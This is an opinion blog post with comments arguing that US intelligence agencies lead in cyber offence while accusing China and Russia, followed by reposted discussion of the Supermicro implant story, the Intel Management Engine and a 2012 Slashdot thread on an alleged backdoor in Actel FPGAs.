My assumption has always been that the US is projecting its own actions on other nations. At the time when the US was talking the loudest about Chinese cyberwar, the US and Israel had launched STUXNET against the Iranian enrichment plant at Natanz, and the breeder reactor at Bushehr (which happens to be just outside of a large city; the attack took some of its control systems and backup generators offline). Attacks on nuclear power facilities are a war crime under international humanitarian law, which framework the US is signatory to but has not committed to actually follow. This sort of activity happens at the same time that the US distributes talking-points to the media about the danger of Russian hackers crashing the US power grid. I don't think we can psychoanalyze an entire government and I think psychoanalysis is mostly nonsense -- but it's tempting to accuse the US of "projection."

The anti-Russian campaign is about alleged Russian spying, hacking and influence operations. Britain and the Netherland took the lead. Britain accused Russia's military intelligence service (GRU) of spying attempts against the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague and Switzerland, of spying attempts against the British Foreign Office, of influence campaigns related to European and the U.S. elections, and of hacking the international doping agency WADA. British media willingly helped to exaggerate the claims: [ ]

The Netherland [sic] for its part released a flurry of information about the alleged spying attempts against the OPCW in The Hague. It claims that four GRU agents traveled to The Hague on official Russian diplomatic passports to sniff out the WiFi network of the OPCW. (WiFi networks are notoriously easy to hack. If the OPCW is indeed using such it should not be trusted with any security relevant issues.) The Russian officials were allegedly very secretive, even cleaning out their own hotel trash, while they, at the same, time carried laptops with private data and even taxi receipts showing their travel from a GRU headquarter in Moscow to the airport. Like in the Skripal/Novichok saga the Russian spies are, at the same time, portrayed as supervillains and hapless amateurs. Real spies are neither.

The U.S. Justice Department added to the onslaught by issuing new indictments (pdf) against alleged GRU agents dubiously connected to several alleged hacking incidents . As none of those Russians will ever stand in front of a U.S. court the broad allegations will never be tested.

There's a lot there, and I think the interpretation is a bit over-wrought, but it's mostly accurate. The US and the UK (and other NATO allies, as necessary) clearly coordinate when it comes to talking points. Claims of Chinese cyberwar in the US press will be followed by claims in the UK and Australian press, as well. My suspicion is that this is not the US Government and UK Government coordinating a story -- it's the intelligence agencies doing it. My opinion is that the intelligence services are fairly close to a "deep state" -- the CIA and NSA are completely out of control and the CIA has gone far toward building its own military, while the NSA has implemented completely unrestricted surveillance worldwide.

All of this stuff happens against the backdrop of Klein, Binney, Snowden, and the Vault 7 revelations, as well as solid attribution identifying the NSA as "equation group" and linking the code-tree of NSA-developed malware to STUXNET, FLAME, and DUQU. While the attribution that "Fancy Bear is the GRU" has been made and is probably fairly solid, the attribution of NSA malware and CIA malware is rock solid; the US has even admitted to deploying STUXNET -- Obama bragged about it. When Snowden's revelations outlined how the NSA had eavesdropped on Angela Merkel's cellphone, the Germans expressed shock and Barack Obama remarkably truthfully said "that's how these things are done" and blew the whole thing off by saying that the NSA wasn't eavesdropping on Merkel any more. [ bbc ]

It's hard to keep score because everything is pretty vague, but it sounds like the US has been dramatically out-spending and out-acting the other nations that it accuses of being prepared for cyberwar. I tend to be extremely skeptical of US claims because: bomber gap, missile gap, gulf of Tonkin, Iraq WMD, Afghanistan, Libya and every other aggressive attack by the US which was blamed on its target. The reason I assume the US is the most aggressive actor in cyberspace is because the US has done a terrible job of protecting its tool-sets and operational security: it's hard not to see the US is prepared for cyberwar, when both the NSA and the CIA leak massive collections of advanced tools.

Meanwhile, where are the leaks of Russian and Chinese tools? They have been few and far between, if there have been any at all. Does this mean that the Russians and Chinese have amazingly superior tradecraft, if not tools? I don't know. My observation is that the NSA and CIA have been horribly sloppy and have clearly spent a gigantic amount of money preparing to compromise both foreign and domestic systems -- that's bad enough. With friends like the NSA and CIA, who needs Russians and Chinese?

The article does not have great depth to its understanding of the situation, I'm afraid. So it comes off as a bit heavy on the recent news while ignoring the long-term trends. For example:

The allegations of Chinese supply chain attacks are of course just as hypocritical as the allegations against Russia. The very first know case of computer related supply chain manipulation goes back to 1982 :

A CIA operation to sabotage Soviet industry by duping Moscow into stealing booby-trapped software was spectacularly successful when it triggered a huge explosion in a Siberian gas pipeline, it emerged yesterday.

I wrote a piece about the "Farewell Dossier" in 2004. [ mjr ] Re-reading it, it comes off as skeptical but waffly. I think that it's self-promotion by the CIA and exaggerates considerably ("look how clever we are!") at a time when the CIA was suffering an attention and credibility deficit after its shitshow performance under George Tenet. But the first known cases of computer related supply chain manipulation go back to the 70s and 80s -- the NSA even compromised Crypto AG's Hagelin M-209 system (a mechanical ciphering machine) in order to read global communications encrypted with that product. You can imagine Crypto AG's surprise when the Iranian secret police arrested one of their sales reps for selling backdoor'd crypto -- the NSA had never told them about the backdoor, naturally. The CIA was also on record for producing Xerox machines destined for the USSR, which had recorders built into them So, while the article is portraying the historical sweep of NSA dirty tricks, they're only looking at the recent ones. Remember: the NSA also weakened the elliptic curve crypto library in RSA's Bsafe implementation, paying RSADSI $13 million to accept their tweaked code.

Why haven't we been hearing about the Chinese and Russians doing that sort of thing? There are four options:

  1. The Russians and Chinese are doing it, they're just so darned good nobody has caught them until just recently.
  2. The Russians and Chinese simply resort to using existing tools developed by the hacking/cybercrime community and rely on great operational security rather than fancy tools.
  3. The Russian and Chinese efforts are relatively tiny compared to the massive efforts the US expends tens of billions of dollars on. The US spends about $50bn on its intelligence agencies, while the entire Russian Department of Defense budget is about $90bn (China is around $139bn) -- maybe the Russians and Chinese have such a small footprint because they are much smaller operations?
  4. Something else.

That brings us to the recent kerfuffle about taps on the Supermicro motherboards. That's not unbelievable at all -- not in a world where we discover that Intel has built a parallel management CPU into every CPU since 2008, and that there is solid indications that other processors have similar backdoors.

Was the Intel IME a "backdoor" or just "a bad idea"? Well, that's tricky. Let me put my tinfoil hat on: making a backdoor look like a sloppily developed product feature would be the competent way to write a backdoor. Making it as sneaky as the backdoor in the Via is unnecessary -- incompetence is eminently believable.

&

(kaspersky)

I believe all of these stories (including the Supermicro) are the tip of a great big, ugly iceberg. The intelligence community has long known that software-only solutions are too mutable, and are easy to decompile and figure out. They have wanted to be in the BIOS of systems -- on the motherboard -- for a long time. If you go back to 2014, we have disclosures about the NSA malware that hides in hard drive BIOS: [ vice ] [ vice ] That appears to have been in progress around 2000/2001.

Of note, the group recovered two modules belonging to EquationDrug and GrayFish that were used to reprogram hard drives to give the attackers persistent control over a target machine. These modules can target practically every hard drive manufacturer and brand on the market, including Seagate, Western Digital, Samsung, Toshiba, Corsair, Hitachi and more. Such attacks have traditionally been difficult to pull off, given the risk in modifying hard drive software, which may explain why Kaspersky could only identify a handful of very specific targets against which the attack was used, where the risk was worth the reward.

But Equation Group's malware platforms have other tricks, too. GrayFish, for example, also has the ability to install itself into computer's boot record -- software that loads even before the operating system itself -- and stores all of its data inside a portion of the operating system called the registry, where configuration data is normally stored.

EquationDrug was designed for use on older Windows operating systems, and "some of the plugins were designed originally for use on Windows 95/98/ME" -- versions of Windows so old that they offer a good indication of the Equation Group's age.

This is not a very good example of how to establish a "malware gap" since it just makes the NSA look like they are incapable of keeping a secret. If you want an idea how bad it is, Kaspersky labs' analysis of the NSA's toolchain is a good example of how to do attribution correctly. Unfortunately for the US agenda, that solid attribution points toward Fort Meade in Maryland. [kaspersky]

Let me be clear: I think we are fucked every which way from the start. With backdoors in the BIOS, backdoors on the CPU, and wireless cellular-spectrum backdoors, there are probably backdoors in the GPUs and the physical network controllers, as well. Maybe the backdoors in the GPU come from the GRU and maybe the backdoors in the hard drives come from NSA, but who cares? The upshot is that all of our systems are so heinously compromised that they can only be considered marginally reliable. It is, literally, not your computer: it's theirs. They'll let you use it so long as your information is interesting to them.

Do I believe the Chinese are capable of doing such a thing? Of course. Is the GRU? Probably. Mossad? Sure. NSA? Well-documented attribution points toward NSA. Your computer is a free-fire zone. It has been since the mid 1990s, when the NSA was told "no" on the Clipper chip and decided to come up with its own Plan B, C, D, and E. Then, the CIA came up with theirs. Etc. There are probably so many backdoors in our systems that it's a miracle it works at all.

From my 2012 RSA conference lecture "Cyberwar, you're doing it wrong."

The problem is that playing in this space is the purview of governments. Nobody in the cybercrime or hacking world need tools like these. The intelligence operatives have huge budgets, compared to a typical company's security budget, and it's unreasonable to expect any business to invest such a level of effort on defending itself. So what should companies do? They should do exactly what they are doing: expect the government to deal with it; that's what governments are for. The problem with that strategy is that their government isn't on their side, either! It's Hobbes' playground.

In case you think I am engaging in hyperbole, I assure you I am not. If you want another example of the lengths (and willingness to bypass the law) "they" are willing to go, consider 'stingrays' that are in operation in every major US city and outside of every interesting hotel and high tech park. Those devices are not passive -- they actively inject themselves into the call set-up between your phone and your carrier -- your data goes through the stingray, or it doesn't go at all. If there are multiple stingrays, then your latency goes through the roof. "They" don't care. Are the stingrays NSA, FBI, CIA, Mossad, GRU, or PLA? Probably a bit of all of the above depending on where and when.

Whenever the US gets caught with its pants down around its ankles, it blames the Chinese or the Russians because they have done a good job of building the idea that the most serious hackers on the planet at the Chinese. I don't believe that we're seeing complex propaganda campaigns that are tied to specific incidents -- I think we see ongoing organic propaganda campaigns that all serve the same end: protect the agencies, protect their budgets, justify their existence, and downplay their incompetence.

So, with respect to "propaganda" I would say that the US intelligence community has been consistently pushing a propaganda agenda against the US government, and the citizens in order to justify its actions and defend its budget.

The government also engages in propaganda, and is influenced by the intelligence community's propaganda as well. And the propaganda campaigns work because everyone involved assumes, "well, given what the NSA has been able to do, I should assume the Chinese can do likewise." That's a perfectly reasonable assumption and I think it's probably true that the Chinese have capabilities. The situation is what Chuck Spinney calls "A self-licking ice cream cone" -- it's a justifying structure that makes participation in endless aggression seem like a sensible thing to do. And, when there's inevitably a disaster, it's going to be like a cyber-9/11 and will serve as a justification for even more unrestrained aggression.


Want to see what it looks like? A thousand thanks to Commentariat member [redacted] for this link. If you don't like video, there's an article here. [ toms ]

https://www.youtube.com/embed/_eSAF_qT_FY

Is this an NSA backdoor, or normal incompetence? Is Intel Management Engine an NSA-inspired backdoor, or did some system engineers at Intel think that was a good idea? There are other scary indications of embedded compromise: the CIA's Vault7 archive included code that appeared to be intended to embed in the firmware of "smart" flatscreen TVs. That would make every LG flat panel in every hotel room, a listening device just waiting to be turned on.

We know the Chinese didn't do that particular bug but why wouldn't they do something similar, in something else? China is the world's oldest mature culture -- they literally wrote the book on strategy -- Americans acting as though it's a great surprise to learn that the Chinese are not stupid, it's just the parochialism of a 250 year-old culture looking at a 3,000 year-old culture and saying "wow, you guys haven't been asleep at the switch after all!"

WIRED on cyberspace treaties [ wired ]

Comments
  1. Pierce R. Butler says

    October 6, 2018 at 1:31 pm

    What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes.

    Funny how those obsessed with "false flag" operations work so hard to invite more of same.

  2. Marcus Ranum says

    October 6, 2018 at 2:28 pm

    Pierce R. Butler@#1:
    What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes.

    Yes. Since 2001, as far as most of us can tell, federal cybersecurity spend has been 80% offense, 20% defense. And a lot of the offensive spend has been aimed at We, The People.

  3. Cat Mara says

    October 6, 2018 at 5:20 pm

    Your mention of Operation Sundevil and Kevin Mitnick in a previous post made me think that maybe the reason we haven't seen the kind of leaks from the Russian and Chinese hacking operations that we've seem from the NSA is that they're running a "Kevin Mitnick style" operation; that is, relying less on technical solutions and using instead old-fashioned "social engineering" and other low-tech forms of espionage (like running troll farms on social media). I mean, I've seen interviews with retired US intelligence people since the 90s complain that since the late 1980s, the intelligence agencies have been crippled by management in love with hi-tech "SIGINT" solutions to problems that never deliver and neglecting old-fashioned "HUMINT" intelligence-gathering.

    The thing is, Kevin Mitnick got away with a lot of what he did because people didn't take security seriously then, and still don't. On a similar nostalgia vibe, I remember reading an article by Keith Bostic (one of the researchers who helped in the analysis of the Morris worm that took down a significant chunk of the Internet back in 1988) where he did a follow-up a year or so afterwards and some depressing number of organisations that had been hit by it still hadn't patched the holes that had let the worm infect them in the first place.

  4. Marcus Ranum says

    October 6, 2018 at 9:20 pm

    Cat Mara@#3:
    Your mention of Operation Sundevil and Kevin Mitnick in a previous post made me think that maybe the reason we haven't seen the kind of leaks from the Russian and Chinese hacking operations that we've seem from the NSA is that they're running a "Kevin Mitnick style" operation; that is, relying less on technical solutions and using instead old-fashioned "social engineering" and other low-tech forms of espionage (like running troll farms on social media).

    I think that's right, to a high degree. What if Edward Snowden was an agent provocateur instead of a well-meaning naive kid? A tremendous amount of damage could be done, as well as stealing the US' expensive toys. The Russians have been very good at doing exactly that sort of operation, since WWII. The Chinese are, if anything, more subtle than the Russians.

    The Chinese attitude, as expressed to me by someone who might be a credible source is, "why are you picking a fight with us? We don't care, you're too far away for us to threaten you, we both have loads of our own fish to fry. To them, the US is young, hyperactive, and stupid.

    The FBI is not competent, at all, against old-school humint intelligence-gathering. Compared to the US' cyber-toys, the old ways are probably more efficient and cost effective. China's intelligence community is also much more team-oriented than the CIA/NSA; they're actually a disciplined operation under the strategic control of policy-makers. That, by the way, is why Russians and Chinese stare in amazement when Americans ask things like "Do you think Putin knew about this?" What a stupid question! It's an autocracy; they don't have intelligence operatives just going an deciding "it's a nice day to go to England with some Novichok." The entire American attitude toward espionage lacks maturity.

    On a similar nostalgia vibe, I remember reading an article by Keith Bostic (one of the researchers who helped in the analysis of the Morris worm that took down a significant chunk of the Internet back in 1988) where he did a follow-up a year or so afterwards and some depressing number of organisations that had been hit by it still hadn't patched the holes that had let the worm infect them in the first place.

    That as an exciting time. We were downstream from University of Maryland, which got hit pretty badly. Pete Cottrel and Chris Torek from UMD were also in on Bostic's dissection. We were doing uucp over TCP for our email (that changed pretty soon after the worm) and our uucp queue blew up. I cured the worm with a reboot into single-user mode and a quick 'rm -f' in the uucp queue.

  5. Bob Moore says

    October 7, 2018 at 9:18 am

    Thanks. I appreciate your measured analysis and the making explicit of the bottom line: " agencies, protect their budgets, justify their existence, and downplay their incompetence."

[Oct 05, 2018] The SuperMicro chips problem may be an alleged use of the Intel Management Engine (or the AMD equivalent).

Oct 05, 2018 | www.moonofalabama.org

daffyDuct , Oct 5, 2018 8:35:21 PM | link

The SuperMicro chips may be an alleged use of the Intel Management Engine (or the AMD equivalent).

From Bloomberg: https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies

"In simplified terms, the implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard, two people familiar with the chips' operation say. This happened at a crucial moment, as small bits of the operating system were being stored in the board's temporary memory en route to the server's central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

The illicit chips could do all this because they were connected to the baseboard management controller, a kind of superchip that administrators use to remotely log in to problematic servers, giving them access to the most sensitive code even on machines that have crashed or are turned off."

From Wikipedia: https://en.wikipedia.org/wiki/Intel_Management_Engine

"The Intel Management Engine (ME), also known as the Manageability Engine, is an autonomous subsystem that has been incorporated in virtually all of Intel's processor chipsets since 2008. The subsystem primarily consists of proprietary firmware running on a separate microprocessor that performs tasks during boot-up, while the computer is running, and while it is asleep.As long as the chipset or SoC is connected to current (via battery or power supply), it continues to run even when the system is turned off. Intel claims the ME is required to provide full performance. Its exact workings are largely undocumented and its code is obfuscated using confidential huffman tables stored directly in hardware, so the firmware does not contain the information necessary to decode its contents. Intel's main competitor AMD has incorporated the equivalent AMD Secure Technology (formally called Platform Security Processor) in virtually all of its post-2013 CPUs.

The Electronic Frontier Foundation (EFF) and security expert Damien Zammit accuse the ME of being a backdoor and a privacy concern. Zammit states that the ME has full access to memory (without the parent CPU having any knowledge); has full access to the TCP/IP stack and can send and receive network packets independent of the operating system, thus bypassing its firewall. Intel asserts that it "does not put back doors in its products" and that its products do not "give Intel control or access to computing systems without the explicit permission of the end user."

[Oct 04, 2018] Despicable fear mongering by Bloomberg

Notable quotes:
"... Plus according to Microsemi's own website, all military and aerospace qualified versions of their parts are still made in the USA. So this "researcher" used commercial parts, which depending on the price point can be made in the plant in Shanghai or in the USA at Microsemi's own will. ..."
"... The "researcher" and the person who wrote the article need to spend some time reading more before talking. ..."
"... You clearly have NOT used a FPGA or similar. First the ProASIC3 the article focuses on is the CHEAPEST product in the product line (some of that model line reach down to below a dollar each). But beyond that ... Devices are SECURED by processes, such as blowing the JTAG fuses in the device which makes them operation only, and unreadable. They are secureable, if you follow the proper processes and methods laid out by the manufacturer of the specific chip. ..."
"... Just because a "research paper" claims there is other then standard methods of JTAG built into the JTAG doesn't mean that the device doesn't secure as it should, nor does it mean this researcher who is trying to peddle his own product is anything but biased in this situation. ..."
"... You do know that the Mossad has been caught stealing and collecting American Top Secrets. ..."
"... The original article is here. [cam.ac.uk] It refers to an Actel ProAsic3 chip, which is an FPGA with internal EEPROM to store the configuration. ..."
"... With regard to reprogramming the chip remotely or by the FPGA itself via the JTAG port: A secure system is one that can't reprogram itself. ..."
"... When I was designing VMEbus computer boards for a military subcontractor many years ago, every board had a JTAG connector that required the use of another computer with a special cable plugged into the board to perform reprogramming of the FPGAs. None of this update-by-remote-control crap. ..."
"... It seems that People's Republic of China has been misidentified with Taiwan (Republic of China). ..."
"... Either the claims will be backed up by independently reproduced tests or they won't. But, given his apparent track record in this area and the obvious scrutiny this would bring, Skorobogatov must have been sure of his results before announcing this. ..."
"... Where was this undocumented feature/bug designed in? I see plenty of "I hate China" posts, it would be quite hilarious if the fedgov talked the US mfgr into adding this backdoor, then the Chinese built it as designed. Perhaps the plan all along was to blame the Chinese if they're caught. ..."
"... These are not military chips. They are FPGAs that happen to be used occasionally for military apps. Most of them are sold for other, more commercially exploitable purposes. ..."
"... The page with a link to the final paper actually does mention China. However, it's an American design from a US company. I suspect we will find the backdoor was in the original plans. It will be interesting to see however. ..."
Oct 04, 2018 | it.slashdot.org

Taco Cowboy ( 5327 ) , Tuesday May 29, 2012 @12:17AM ( #40139317 ) Journal

It's a scam !! ( Score: 5 , Informative)

http://erratasec.blogspot.com/2012/05/bogus-story-no-chinese-backdoor-in.html [blogspot.com]

Bogus story: no Chinese backdoor in military chip
"Today's big news is that researchers have found proof of Chinese manufacturers putting backdoors in American chips that the military uses. This is false. While they did find a backdoor in a popular FPGA chip, there is no evidence the Chinese put it there, or even that it was intentionally malicious.

Furthermore, the Actel ProAsic3 FPGA chip isn't fabricated in China at all !!

jhoegl ( 638955 ) , Monday May 28, 2012 @01:30PM ( #40136003 )
Fear mongering ( Score: 5 , Insightful)

It sells...

khasim ( 1285 ) writes: < brandioch.conner@gmail.com > on Monday May 28, 2012 @01:48PM ( #40136097 )
Particularly in a press release like that. ( Score: 5 , Insightful)

That entire article reads more like a press release with FUD than anything with any facts.

Which chip?
Which manufacturer?
Which US customer?

No facts and LOTS of claims. It's pure FUD.

(Not that this might not be a real concern. But the first step is getting past the FUD and marketing materials and getting to the real facts.)

ArsenneLupin ( 766289 ) , Tuesday May 29, 2012 @01:11AM ( #40139489 )
Re:Particularly in a press release like that. ( Score: 5 , Informative)

A quick google showed that that this is indeed the chip, but the claims are "slightly" overblown [blogspot.com]

Anonymous Coward , Monday May 28, 2012 @02:14PM ( #40136273 )
Most likely inserted by Microsemi/Actel not fab ( Score: 5 , Informative)

1) Read the paper http://www.cl.cam.ac.uk/~sps32/Silicon_scan_draft.pdf
2) This is talking about FPGAs designed by Microsemi/Actel.
3) The article focuses on the ProAsic3 chips but says all the Microsemi/Actel chips tested had the same backdoor including but not limited to Igloo, Fusion and Smartfusion.
4) FPGAs give JTAG access to their internals for programming and debugging but many of the access methods are proprietary and undocumented. (security through obscurity)
5) Most FPGAs have features that attempt to prevent reverse engineering by disabling the ability to read out critical stuff.
6) These chips have a secret passphrase (security through obscurity again) that allows you to read out the stuff that was supposed to be protected.
7) These researchers came up with a new way of analyzing the chip (pipeline emission analysis) to discover the secret passphrase. More conventional analysis (differential power analysis) was not sensitive enough to reveal it.

This sounds a lot (speculation on my part) like a deliberate backdoor put in for debug purposes, security through obscurity at it's best. It doesn't sound like something secret added by the chip fab company, although time will tell. Just as embedded controller companies have gotten into trouble putting hidden logins into their code thinking they're making the right tradeoff between convenience and security, this hardware company seems to have done the same.

Someone forgot to tell the marketing droids though and they made up a bunch of stuff about how the h/w was super secure.

JimCanuck ( 2474366 ) , Monday May 28, 2012 @04:45PM ( #40137217 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 5 , Interesting)

I don't think anyone fully understands JTAG, there are a lot of different versions of it mashed together on the typical hardware IC. Regardless if its a FPGA, microcontroller or otherwise. The so called "back door" can only be accessed through the JTAG port as well, so unless the military installed a JTAG bridge to communicate to the outside world and left it there, well then the "backdoor" is rather useless.

Something that can also be completely disabled by setting the right fuse inside the chip itself to disable all JTAG connections. Something that is considered standard practice on IC's with a JTAG port available once assembled into their final product and programmed.

Plus according to Microsemi's own website, all military and aerospace qualified versions of their parts are still made in the USA. So this "researcher" used commercial parts, which depending on the price point can be made in the plant in Shanghai or in the USA at Microsemi's own will.

The "researcher" and the person who wrote the article need to spend some time reading more before talking.

emt377 ( 610337 ) , Monday May 28, 2012 @07:02PM ( #40137873 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 4 , Insightful)
The so called "back door" can only be accessed through the JTAG port as well, so unless the military installed a JTAG bridge to communicate to the outside world and left it there, well then the "backdoor" is rather useless.

With pin access to the FPGA it's trivial to hook it up, no bridges or transceivers needed. If it's a BGA then get a breakout/riser board that provides pin access. This is off-the-shelf stuff. This means if the Chinese military gets their hands on the hardware they can reverse engineer it. They won't have to lean very hard on the manufacturer for them to cough up every last detail. In China you just don't say no to such requests if you know what's good for you and your business.

JimCanuck ( 2474366 ) , Monday May 28, 2012 @11:05PM ( #40139083 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 4 , Interesting)
Not being readable even when someone has the device in hand is exactly what these secure FPGAs are meant to protect against!

It's not a non-issue. It's a complete failure of a product to provide any advantages over non-secure equivalents.

You clearly have NOT used a FPGA or similar. First the ProASIC3 the article focuses on is the CHEAPEST product in the product line (some of that model line reach down to below a dollar each). But beyond that ... Devices are SECURED by processes, such as blowing the JTAG fuses in the device which makes them operation only, and unreadable. They are secureable, if you follow the proper processes and methods laid out by the manufacturer of the specific chip.

Just because a "research paper" claims there is other then standard methods of JTAG built into the JTAG doesn't mean that the device doesn't secure as it should, nor does it mean this researcher who is trying to peddle his own product is anything but biased in this situation.

nospam007 ( 722110 ) * , Monday May 28, 2012 @02:39PM ( #40136445 )
Re:What did the military expect? ( Score: 4 , Interesting)

"Even if this case turns out to be a false alarm, allowing a nation that you repeatedly refer to as a 'near-peer competitor' to build parts of your high-tech weaponry is idiotic."

Not to mention the non-backdoor ones.

'Bogus electronic parts from China have infiltrated critical U.S. defense systems and equipment, including Navy helicopters and a commonly used Air Force cargo aircraft, a new report says.'

http://articles.dailypress.com/2012-05-23/news/dp-nws-counterfeit-chinese-parts-20120523_1_fake-chinese-parts-counterfeit-parts-air-force-c-130j [dailypress.com]

0123456 ( 636235 ) , Monday May 28, 2012 @02:04PM ( #40136219 )
Re:Should only buy military components from allies ( Score: 3 , Funny)
The US military should have a strict policy of only buying military parts from sovereign, free, democratic countries with a long history of friendship, such as Israel, Canada, Europe, Japan and South Korea.

Didn't the US and UK governments sell crypto equipment they knew they could break to their 'allies' during the Cold War?

tlhIngan ( 30335 ) writes: < slashdot@[ ]f.net ['wor' in gap] > on Monday May 28, 2012 @03:30PM ( #40136781 )
Re:Should only buy military components from allies ( Score: 5 , Insightful)
Second problem.... 20 years ago the DOD had their own processor manufacturing facilities, IC chips, etc. They were shut down in favor of commercial equipment because some idiot decided it was better to have an easier time buying replacement parts at Radioshack than buying quality military-grade components that could last in austere environments. (Yes, speaking from experience). Servers and workstations used to be built from the ground up at places like Tobyhanna Army Depot. Now, servers and workstations are bought from Dell.

Fabs are expensive. The latest generation nodes cost billions of dollars to set up and billions more to run. If they aren't cranking chips out 24/7, they're literally costing money. Yes, I know it's hte military, but I'm sure people have a hard time justifying $10B every few years just to fab a few chips. One of the biggest developments in the 90s was the development of foundries that let anyone with a few tens of millions get in the game of producing chips rather than requiring billions in startup costs. Hence the startup of tons of fabless companies selling chips.

OK, another option is to buy a cheap obsolete fab and make chips that way - much cheaper to run, but we're also talking maybe 10+ year old technology, at which point the chips are going to be slower and take more power.

Also, building your own computer from the ground up is expensive - either you buy the designs of your servers from say, Intel, or design your own. If you buy it, it'll be expensive and probably require your fab to be upgraded (or you get stuck with an old design - e.g., Pentium (the original) - which Intel bought back from the DoD because the DoD had been debugging it over the decade). If you went with the older cheaper fab, the design has to be modified to support that technology (you cannot just take a design and run with it - you have to adapt your chip to the foundry you use).

If you roll your own, that becomes a support nightmare because now no one knows the system.

And on the taxpayer side - I'm sure everyone will question why you're spending billions running a fab that's only used at 10% capacity - unless you want the DoD getting into the foundry business with its own issues.

Or, why is the military spending so much money designing and running its own computer architecture and support services when they could buy much cheaper machines from Dell and run Linux on them?

Hell, even if the DoD had budget for that, some bean counter will probably do the same so they can save money from one side and use it to buy more fighter jets or something.

30+ years ago, defense spending on electronics formed a huge part of the overall electronics spending. These days, defense spending is but a small fraction - it's far more lucrative to go after the consumer market than the military - they just don't have the economic clout they once had. End result is the military is forced to buy COTS ICs, or face stuff like a $0.50 chip costing easily $50 or more for same just because the military is a bit-player for semiconductors

__aaltlg1547 ( 2541114 ) , Monday May 28, 2012 @02:29PM ( #40136361 )
Re:Should only buy military components from allies ( Score: 2 )

Anybody remember Jonathan Pollard?

Genda ( 560240 ) writes: < <ten.tog> <ta> <teiram> > on Monday May 28, 2012 @03:46PM ( #40136857 ) Journal
Re:Should only buy military components from allies ( Score: 2 )

You do know that the Mossad has been caught stealing and collecting American Top Secrets. In fact most of the nations above save perhaps Canada have at one time or another been caught either spying on us, or performing dirty deeds cheap against America's best interest. I'd say for the really classified stuff, like the internal security devices that monitor everything else... homegrown only thanks, and add that any enterprising person who's looking to get paid twice by screwing with the hardware or selling secrets to certified unfriendlies get's to cools their heels for VERY LONG TIME.

NixieBunny ( 859050 ) , Monday May 28, 2012 @01:34PM ( #40136025 ) Homepage
The actual article ( Score: 5 , Informative)

The original article is here. [cam.ac.uk] It refers to an Actel ProAsic3 chip, which is an FPGA with internal EEPROM to store the configuration.

Anonymous Coward , Monday May 28, 2012 @02:09PM ( #40136249 )
Re:The actual article ( Score: 5 , Interesting)

From your much more useful link,

We investigated the PA3 backdoor problem through Internet searches, software and hardware analysis and found that this particular backdoor is not a result of any mistake or an innocent bug, but is instead a deliberately inserted and well thought-through backdoor that is crafted into, and part of, the PA3 security system. We analysed other Microsemi/Actel products and found they all have the same deliberate backdoor. Those products include, but are not limited to: Igloo, Fusion and Smartfusion.
we have found that the PA3 is used in military products such as weapons, guidance, flight control, networking and communications. In industry it is used in nuclear power plants, power distribution, aerospace, aviation, public transport and automotive products. This permits a new and disturbing possibility of a large scale Stuxnet-type attack via a network or the Internet on the silicon itself. If the key is known, commands can be embedded into a worm to scan for JTAG, then to attack and reprogram the firmware remotely.

emphasis mine. Key is retrieved using the backdoor. Frankly, if this is true, Microsemi/Actel should get complete ban from all government contracts, including using their chips in any item build for use by the government.

NixieBunny ( 859050 ) , Monday May 28, 2012 @02:44PM ( #40136487 ) Homepage
Re:The actual article ( Score: 3 )

I would not be surprised if it's a factory backdoor that's included in all their products, but is not documented and is assumed to not be a problem because it's not documented.

With regard to reprogramming the chip remotely or by the FPGA itself via the JTAG port: A secure system is one that can't reprogram itself.

When I was designing VMEbus computer boards for a military subcontractor many years ago, every board had a JTAG connector that required the use of another computer with a special cable plugged into the board to perform reprogramming of the FPGAs. None of this update-by-remote-control crap.

Blackman-Turkey ( 1115185 ) , Monday May 28, 2012 @02:19PM ( #40136305 )
Re:The actual article ( Score: 3 , Informative)

No source approved [dla.mil] for Microsemi (Actel) qualified chips in China. If you use non-approved sources then, well, shit happens (although how this HW backdoor would be exploited is kind of unclear).

It seems that People's Republic of China has been misidentified with Taiwan (Republic of China).

6031769 ( 829845 ) , Monday May 28, 2012 @01:35PM ( #40136031 ) Homepage Journal
Wait and see ( Score: 5 , Informative)

Either the claims will be backed up by independently reproduced tests or they won't. But, given his apparent track record in this area and the obvious scrutiny this would bring, Skorobogatov must have been sure of his results before announcing this.

Here's his publications list from his University home page, FWIW: http://www.cl.cam.ac.uk/~sps32/#Publications [cam.ac.uk]

Anonymous Coward , Monday May 28, 2012 @01:36PM ( #40136039 )
samzenpus will be looking for a new job soon ( Score: 3 , Funny)
Even though this story has been blowing-up on Twitter, there are a few caveats. The backdoor doesn't seem to have been confirmed by anyone else, Skorobogatov is a little short on details, and he is trying to sell the scanning technology used to uncover the vulnerability.

Hey hey HEY! You stop that right this INSTANT, samzenpus! This is Slashdot! We'll have none of your "actual investigative research" nonsense around here! Fear mongering to sell ad space, mister, and that's ALL! Now get back to work! We need more fluffy space-filling articles like that one about the minor holiday labeling bug Microsoft had in the UK! That's what we want to see more of!

laing ( 303349 ) , Monday May 28, 2012 @02:08PM ( #40136243 )
Requires Physical Access ( Score: 5 , Informative)

The back-door described in the white paper requires access to the JTAG (1149.1) interface to exploit. Most deployed systems do not provide an active external interface for JTAG. With physical access to a "secure" system based upon these parts, the techniques described in the white paper allow for a total compromise of all IP within. Without physical access, very little can be done to compromise systems based upon these parts.

vlm ( 69642 ) , Monday May 28, 2012 @03:34PM ( #40136807 )
Where was it designed in? ( Score: 3 )

Where was this undocumented feature/bug designed in? I see plenty of "I hate China" posts, it would be quite hilarious if the fedgov talked the US mfgr into adding this backdoor, then the Chinese built it as designed. Perhaps the plan all along was to blame the Chinese if they're caught.

These are not military chips. They are FPGAs that happen to be used occasionally for military apps. Most of them are sold for other, more commercially exploitable purposes.

time961 ( 618278 ) , Monday May 28, 2012 @03:51PM ( #40136887 )
Big risk is to "secret sauce" for comms & cryp ( Score: 5 , Informative)

